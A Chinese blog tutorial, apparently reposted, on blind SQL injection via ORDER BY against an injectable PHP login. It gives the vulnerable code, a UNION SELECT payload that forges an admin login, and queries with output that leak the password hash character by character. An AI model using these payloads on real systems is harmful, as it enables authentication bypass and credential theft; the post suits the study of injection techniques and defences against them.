利用order by 进行盲注

  • A+
所属分类:颓废's Blog
摘要

有下列表: 这样一个一般的场景,用户登录时,用户名错误提示:用户名错误,用户名正确密码错误提示:密码错误

登录代码:

$username = $_POST['username']; $password = $_POST['password']; if(filter($username)){     //过滤括号 }else{     $sql="SELECT * FROM admin WHERE username='".$username."'";     $result=mysql_query($sql);     @$row = mysql_fetch_array($result);     if(isset($row) && $row['username'] === 'admin'){         if ($row['password']===md5($password)){             //Login successful         }else{             die("password error!");         }     }else{         die("username does not exist!");     } } 

有下列表:

mysql> select * from admin where username='admin'; +----+----------+----------------------------------+ | id | username | password                         | +----+----------+----------------------------------+ |  1 | admin    | 51b7a76d51e70b419f60d3473fb6f900 | +----+----------+----------------------------------+ 1 row in set (0.00 sec) 

这样一个一般的场景,用户登录时,用户名错误提示:用户名错误,用户名正确密码错误提示:密码错误

UNION SELECT登录

看到这个逻辑第一想法肯定是直接利用union select伪造密码登录:

username=' union select 1,'admin','c4ca4238a0b923820dcc509a6f75849b&password=1

mysql> select * from admin where username='' union select 1,'admin','c4ca4238a0b923820dcc509a6f75849b'; +----+----------+----------------------------------+ | id | username | password                         | +----+----------+----------------------------------+ |  1 | admin    | c4ca4238a0b923820dcc509a6f75849b | +----+----------+----------------------------------+ 1 row in set (0.00 sec) 

但是想得到password怎么办

由登录提示可获取一个bool条件,如何用order by利用这个bool条件

mysql> select * from admin where username='' or 1 union select 1,2,'5' order by 3; +----+----------+----------------------------------+ | id | username | password                         | +----+----------+----------------------------------+ |  1 | 2        | 5                                | |  1 | admin    | 51b7a76d51e70b419f60d3473fb6f900 | +----+----------+----------------------------------+ 2 rows in set (0.00 sec)  mysql> select * from admin where username='' or 1 union select 1,2,'6' order by 3; +----+----------+----------------------------------+ | id | username | password                         | +----+----------+----------------------------------+ |  1 | admin    | 51b7a76d51e70b419f60d3473fb6f900 | |  1 | 2        | 6                                | +----+----------+----------------------------------+ 2 rows in set (0.01 sec)  mysql> select * from admin where username='' or 1 union select 1,2,'51' order by 3; +----+----------+----------------------------------+ | id | username | password                         | +----+----------+----------------------------------+ |  1 | 2        | 51                               | |  1 | admin    | 51b7a76d51e70b419f60d3473fb6f900 | +----+----------+----------------------------------+ 2 rows in set (0.00 sec)  mysql> select * from admin where username='' or 1 union select 1,2,'52' order by 3; +----+----------+----------------------------------+ | id | username | password                         | +----+----------+----------------------------------+ |  1 | admin    | 51b7a76d51e70b419f60d3473fb6f900 | |  1 | 2        | 52                               | +----+----------+----------------------------------+ 2 rows in set (0.00 sec) 

通过逐位判断便可得到password

显然此方法在实际中使用的不多,但在一些特定的环境中也许会用到,比如实验环境,如果过滤了括号,其他盲注基本上就是废了,便可利用order by进行注入。

原文地址:http://p0sec.net/index.php/archives/106/

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: